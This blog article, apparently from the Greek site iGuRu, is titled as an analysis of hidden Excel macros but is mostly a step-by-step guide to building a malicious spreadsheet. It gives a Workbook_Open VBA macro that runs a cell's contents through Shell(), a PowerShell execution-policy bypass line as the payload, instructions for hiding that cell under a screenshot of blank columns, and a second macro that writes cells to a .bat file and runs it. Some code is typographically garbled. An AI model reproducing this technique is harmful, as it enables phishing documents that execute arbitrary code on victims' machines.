iGuRu
Now Reading
Social Engineering using Hidden Macros in Excel
iGuRu

Social Engineering using Hidden Macros in Excel

With the following method, we will do an analysis of a malicious document that contains a macro, which is slightly more difficult than an .exe analysis, but not impossible.

Screenshot 2020 08 12 Microsoft Excel How to Enable Macros to Speed ​​Up Repetitive Tasks - Social Engineering using Hidden Macros in Excel

NOTE: Simply running a tool like oledump or olevba will return macros to the document.

All it will show is that the macro extracts code from a specific column and executes it using Shell (), which is shown below to be suspicious:

macro - Social Engineering using Hidden Macros in Excel

And if we navigate to BG1 where the code appears, we do not immediately see anything suspicious:

active - Social Engineering using Hidden Macros in Excel

But if you hover your mouse over the BG1 (or just look a little closer and notice the columns that are not aligned), then you will see that there is an image that overlaps the code:

exel - Social Engineering using Hidden Macros in Excel

power - Social Engineering using Hidden Macros in Excel

 

Obviously someone with a little more patience could refine the screenshot of the blank columns and overlay it over the code to make it less noticeable.

Another way to reveal the code extracted from the .excel worksheet is by using MsgBox :

hello - Social Engineering using Hidden Macros in Excel

Creating the document

What's needed:

  1. Screenshot of a set of blank columns to overlay over code, for exampleimg6 - Social Engineering using Hidden Macros in Excel
  2. Macros that extract code from the workbook and execute data:
Private Sub Workbook_Open() Date = Sheet1.Range("BG1") Shell(Date) End Sub
  • Data = Sheet1.Range (“BG1”) Just look at the row in BG1, extract everything in the row and place it inside the variable  Data
  1. Code that will be exported and executed when the document is opened and the user clicks on "Enable Content"
powershell.exe -exec bypass -C echo "Hello world" > C:\ Users \ Desktop \ Conduct \ Desktop \ test.txt

After entering the code in any column you want, simply insert the image of the blank columns above the code (Insert> Illustrations> Images)

Then import the macros into ThisWorkbook and change the section  Range ()  to match your column. If you entered the data in column A and it is in the 1st row, it would be  range (“A1”)

Compose multiple lines in a file

Writing multiple lines in a file is a simple piece and only requires adding a few lines of code.

The macro code used is here:

Private Sub Workbook_Open ()

1. Dim Path As String

2. Dim FileNumber As Integer

3. FileNumber = FreeFile

4. Data = Sheet1.Range (“BG1”)

5. Data2 = Sheet1.Range (“BG2”)

6. Path = “test.bat”

7. Open Path For Output As FileNumber

8. Print #FileNumber, Data

9. Print #FileNumber, Data2

10. Close FileNumber 11. Shell (Path) End Sub

  • Lines 1-3 are static, keep them as they are. They just define the variables used
  • Lines 4-6 are dynamic. You will need to change the strings to 4 & 5 so that it is where your code is in excel worksheet terms. Change line 6 to the file path you want.
  • Lines 7-9 are also dynamic, just open the file and write the extracted data to the file. Lines 8 & 9 in particular are the lines that are responsible for compiling the data in the file.

Just enter the code you want to write to a file, note the column and row in which it is located, and change the Data & Data1 variable to fit your column and row (add more variables if needed).

Then overlay the code with the blank line screenshot and you're done!

 

 

Read them Technology News from all over the world, with the validity of iGuRu.gr

Follow us on Google News

View Comments (0)

Leave a Reply

Your email address Will not be published.

 

iGuRu.gr © 2012 - 2021 Keep it Simple Stupid Custom Theme

Scroll To Top